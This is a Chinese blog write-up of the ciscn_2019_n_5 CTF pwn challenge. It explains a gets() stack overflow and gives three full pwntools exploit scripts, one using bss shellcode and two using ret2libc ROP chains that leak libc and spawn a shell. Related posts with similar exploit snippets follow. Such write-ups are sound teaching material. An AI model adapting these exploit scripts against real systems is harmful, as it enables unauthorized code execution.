[CISCN 2019华北] PWN5(ciscn_2019_n_5) 复现

已于 2023-10-13 18:10:19 修改
阅读量1k 收藏 1
点赞数 4
分类专栏: PWN 文章标签: 网络安全 安全
于 2023-09-05 12:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/132683506
版权

ciscn_2019_n_5

老套路,首先checksec一下文件,保护机制全关(这个时候就要想到可以直接shellcode)

然后ida一下看看伪代码,可以发现一个在bss段上面的name,并且在该代码段为可读可写可执行的权限,也很容易看出来gets造成了溢出,下面就开始对症下药:

法一:

直接在bss段name上面直接构造shellcode(因为该文件未开启NX保护机制,并且该代码段权限全开),然后直接溢出就可以得到shell

from pwn import *
context(arch='amd64',os='linux',log_level='debug')

io =remote('node4.anna.nssctf.cn',28499)

shellcode =asm(shellcraft.sh())
io.sendlineafter(b'tell me your name\n',shellcode)

name =0x601080
payload =b'a'*(0x20 +8) +p64(name)

io.recvuntil(b'What do you want to say to me?\n')

io.sendline(payload)
io.interactive()

法二:(无libc版本文件)

可以直接看成是ret2libc,直接泄露libc,构造rop链来获得shell,因为这题有一个在bss段上面的name,所以可以直接把/bin/sh写到name里面,最后直接执行就能获得shell

exp如下:

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./pwn')
p = remote('node4.anna.nssctf.cn',28499)
elf = ELF('./111')

#gdb.attach(p, 'b *0x4006a9')
plt_addr =elf.sym['puts']
got_addr =elf.got['puts']
main_addr =0x400636
ret_addr =0x4004c9
rdi_addr =0x400713
name_addr =0x601080

p.sendafter(b'name\n', b'1')

payload =b'a'*(0x20 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
p.sendlineafter(b'me?\n', payload)

puts_addr =u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc =LibcSearcher('puts',puts_addr)
libc_base =puts_addr -libc.dump('puts')
system =libc_base + libc.dump('system')

p.sendafter(b'name\n', b'/bin/sh\x00')
payload =b'a'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(name_addr) +p64(system)

p.sendlineafter(b'me?\n',payload)
p.interactive()

法三:(有libc版本文件)

此题为ubuntu 18()64位,可在buu上面直接找到相对应的libc版本,构造的时候有些地方与无libc版本的不同,需要注意,exp如下:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./pwn')
p = remote('node4.anna.nssctf.cn',28158)
elf = ELF('./111')
libc = ELF('./libc-2.27.so')

#gdb.attach(p, 'b *0x4006a9')
plt_addr =elf.sym['puts']
got_addr =elf.got['puts']
main_addr =0x400636
ret_addr =0x4004c9
rdi_addr =0x400713
name_addr =0x601080

p.sendafter(b'name\n', b'1')

payload =b'a'*(0x20 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
p.sendlineafter(b'me?\n', payload)

puts_addr =u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc_base =puts_addr -libc.sym['puts']
system =libc_base + libc.sym['system']

p.sendafter(b'name\n', b'/bin/sh\x00')
payload =b'a'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(name_addr) +p64(system)

p.sendlineafter(b'me?\n',payload)
p.interactive()

总结:

此题我认为需要认真分析伪代码,发现其漏洞和一些重要信息,并且需要了解怎么构造shellcode和构造rop执行流,这些都是比较基础的知识点,最后 法二 和 法三 构造exp有些不同点,可以尝试对比一下,你应该会收获不少(上述为个人看法,如有不对,希望各位师傅指正)

Xzzzz911
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ciscn_2019_n_5
qq_39869547的博客
01-11 969
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
【CTF】ciscn_2019_n_5
凉水的博客
04-22 952
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 772
[buuctf]ciscn_2019_n_5
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 575
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 329
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
5. **综合和仿真**:编写完成后,通过EDA工具对Verilog代码进行综合(将高级描述转化为门级电路)和仿真(验证设计功能),确保其正确无误。 通过以上步骤,我们就可以用Verilog HDL实现一个基本的PWM控制器。在...
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1240
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1503
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 638
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解题思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
BUU刷题-Pwn-ciscn_2019_n_5
一个啥也不会的小菜鸡!
06-23 82
通过向name中写入shellcode,并执行该shellcode。
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3220
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8384
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值